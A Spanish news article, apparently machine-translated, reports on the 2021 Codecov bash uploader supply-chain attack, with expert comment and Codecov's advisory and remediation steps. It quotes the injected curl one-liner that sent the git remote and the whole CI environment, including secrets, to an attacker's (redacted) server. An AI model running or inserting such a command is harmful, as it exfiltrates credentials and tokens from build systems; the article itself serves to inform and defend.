La herramienta de desarrollador con puerta trasera que robó credenciales pasó desapercibida durante 3 meses

La herramienta de desarrollador con puerta trasera que robó credenciales pasó desapercibida durante 3 meses

imágenes falsas

Una herramienta de desarrollo de software disponible públicamente contenía código malicioso que robaba las credenciales de autenticación que las aplicaciones necesitan para acceder a recursos confidenciales. Es la última revelación de un ataque a la cadena de suministro que tiene el potencial de hacer puertas traseras a las redes de innumerables organizaciones.

El cargador de bash de Codecov contenía la puerta trasera desde finales de enero hasta principios de abril, los desarrolladores de la herramienta dijo el jueves. La puerta trasera hizo que las computadoras de los desarrolladores enviaran tokens de autenticación secretos y otros datos confidenciales a un sitio remoto controlado por los piratas informáticos. El cargador funciona con plataformas de desarrollo que incluyen Acciones de Github, CircleCI, y Paso de Bitri se

, todos los cuales admiten tener tales tokens de autenticación secretos en el entorno de desarrollo.

Un montón de AWS y otras credenciales de la nube

El cargador de bash de Codecov realiza lo que se conoce como cobertura de código para proyectos de desarrollo de software a gran escala. Permite a los desarrolladores enviar informes de cobertura que, entre otras cosas, determinan qué parte de una base de código ha sido probada por scripts de prueba internos. Algunos proyectos de desarrollo integran Codecov y servicios de terceros similares en sus plataformas, donde hay acceso gratuito a credenciales confidenciales que se pueden usar para robar o modificar el código fuente.

Un código similar a esta única línea apareció por primera vez el 31 de enero:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https:///upload/v2 || true

El código envía tanto la ubicación del repositorio de GitHub como todo el entorno del proceso al sitio remoto, que ha sido redactado porque Codecov dice que es parte de una investigación federal en curso. Estos tipos de entornos suelen almacenar tokens, credenciales y otros secretos para el software en Amazon Web Services o GitHub.

Armado con estos secretos, no hay escasez de cosas maliciosas que un atacante podría hacer en entornos de desarrollo que dependían de la herramienta, dijo HD Moore, experto en seguridad y director ejecutivo de la plataforma de descubrimiento de redes Rumble.

“Realmente depende de lo que haya en el entorno, pero desde el punto en que los atacantes tuvieron acceso (a través del cargador de bash), podrían haber podido instalar puertas traseras en los sistemas donde se ejecutaba”, escribió en un mensaje directo con Ars. . “Para GitHub / CircleCI, esto habría expuesto principalmente el código fuente y las credenciales”.

Moore continuó:

Los atacantes probablemente terminaron con una pila de AWS y otras credenciales en la nube además de tokens que podrían darles acceso a repositorios privados, que incluyen el código fuente pero también todas las demás cosas para las que el token estaba autorizado. En el extremo extremo, estas credenciales se perpetuarían por sí mismas: los atacantes usan un token de GitHub robado para hacer una puerta trasera al código fuente, que luego roba los datos de los clientes, etc. Lo mismo podría aplicarse a AWS y otras cred enciales de la nube. Si las credenciales lo permitieran, podrían habilitar la toma de control de la infraestructura, el acceso a la base de datos, el acceso a archivos, etc.

En el aviso del jueves, Codecov dijo que la versión maliciosa del cargador de bash podría acceder a:

  • Todas las credenciales, tokens o claves que nuestros clientes estaban pasando a través de su corredor de CI (integración continua) que serían accesibles cuando se ejecutara el script de carga de bash.
  • Cualquier servicio, almacén de datos y código de aplicación al que se pueda acceder con estas credenciales, tokens o claves.
  • La información remota de git (URL del repositorio de origen) de los repositorios que utilizan los cargadores de bash para cargar la cobertura en Codecov en CI

“Según los resultados de la investigación forense hasta la fecha, parece que hubo un acceso no autorizado periódico a una clave de Google Cloud Storage (GCS) a partir del 31 de enero de 2021, lo que permitió a un tercero malintencionado alterar una versión de nuestro script de carga de bash para potencialmente exportar información sujeta a la integración continua a un servidor de terceros ”, dijo Codecov. “Codecov aseguró y corrigió el guión el 1 de abril de 2021”.

El aviso de Codecov decía que un error en el proceso de creación de imágenes de Docker de Codecov permitió al pirata informático extraer la credencial necesaria para modificar el script de carga de bash.

La manipulación fue descubierta el 1 de abril por un cliente que notó que el shasum que actúa como una huella digital para confirmar la integridad del cargador de bash no coincidía con el shasum de la versión descargada de https://codecov.io/bash. El cliente se puso en contacto con Codecov y el fabricante de la herramienta sacó la versión maliciosa e inició una investigación.

Codecov insta a cualquier persona que haya utilizado el actualizador de bash durante el período afectado a revocar todas las credenciales, tokens o claves ubicadas en los procesos de CI y crear otras nuevas. Los desarrolladores pueden determinar qué claves y tokens se almacenan en un entorno de CI ejecutando el env comando en CI Pipeline. Cualquier cosa sensible debe considerarse comprometida.

Además, cualquier persona que use una versión almacenada localmente del cargador de bash debe verificar lo siguiente:

Curl -sm 0.5 -d “$(git remote -v)

Si estos comandos aparecen en cualquier lugar de un cargador bash almacenado localmente, los usuarios deben reemplazar inmediatamente el cargador con la versión más reciente de https: //codecov.io.bash.

Codecov dijo que es poco probable que los desarrolladores que utilizan una versión autohospedada de la actualización de bash se vean afectados. “Para verse afectado, su canalización de CI debería obtener el cargador bash de https://codecov.io/bash en lugar de su instalación de Codecov autohospedada. Puede verificar desde dónde está obteniendo el cargador de bash mirando la configuración de su canal de CI ”, dijo la compañía.

El atractivo de los ataques a la cadena de suministro

El compromiso del sistema de distribución y desarrollo de software de Codecov es el último ataque a la cadena de suministro que ha salido a la luz. En diciembre, un compromiso similar afectó a SolarWinds, el fabricante de Austin, Texas, de herramientas de administración de red utilizadas por unas 300.000 organizaciones en todo el mundo, incluidas las empresas Fortune 500 y agencias gubernamentales.

Los piratas informáticos que llevaron a cabo la violación distribuyeron una actualización con puerta trasera que fue descargada por unos 18.000 clientes. Aproximadamente 10 agencias federales de EE. UU. Y 100 empresas privadas finalmente recibieron cargas útiles de seguimiento que enviaron información confidencial a servidores controlados por atacantes. FireEye, Microsoft, Mimecast y Malwarebytes fueron barridos en la campaña.

Más recientemente, los piratas informáticos llevaron a cabo un ataque a la cadena de suministro de software que se utilizó para instalar malware de vigilancia en las computadoras de las personas que usan NoxPlayer, un paquete de software que emula el sistema operativo Android en PC y Mac, principalmente para que los usuarios puedan jugar juegos móviles en esas plataformas. . Una versión con puerta trasera de NoxPlayer estuvo disponible durante cinco meses, dijeron investigadores de ESET.

El atractivo de los ataques a la cadena de suministro para los piratas informáticos es su amplitud y eficacia. Al comprometer a un solo jugador con una alta oferta de software, los piratas informáticos pueden potencialmente infectar a cualquier persona u organización que utilice el producto comprometido. Otra característica que los hackers encuentran beneficiosa: a menudo hay poco o nada que los objetivos puedan hacer para detectar software malicioso distribuido de esta manera porque las firmas digitales indicarán que es legítimo.

Sin embargo, en el caso de la versión de actualización de bash con puerta trasera, habría sido fácil para Codecov o cualquiera de sus clientes detectar la malicia sin hacer nada más que verificar el shasum. La capacidad de la versión maliciosa de escapar del aviso durante tres meses indica que nadie se molestó en realizar esta simple verificación.

Las personas que hayan utilizado el actualizador de bash entre el 31 de enero y el 1 de abril deben inspeccionar cuidadosamente sus compilaciones de desarrollo en busca de signos de compromiso siguiendo los pasos descritos en el aviso del jueves.

Leave a Reply

Your email address will not be published. Required fields are marked *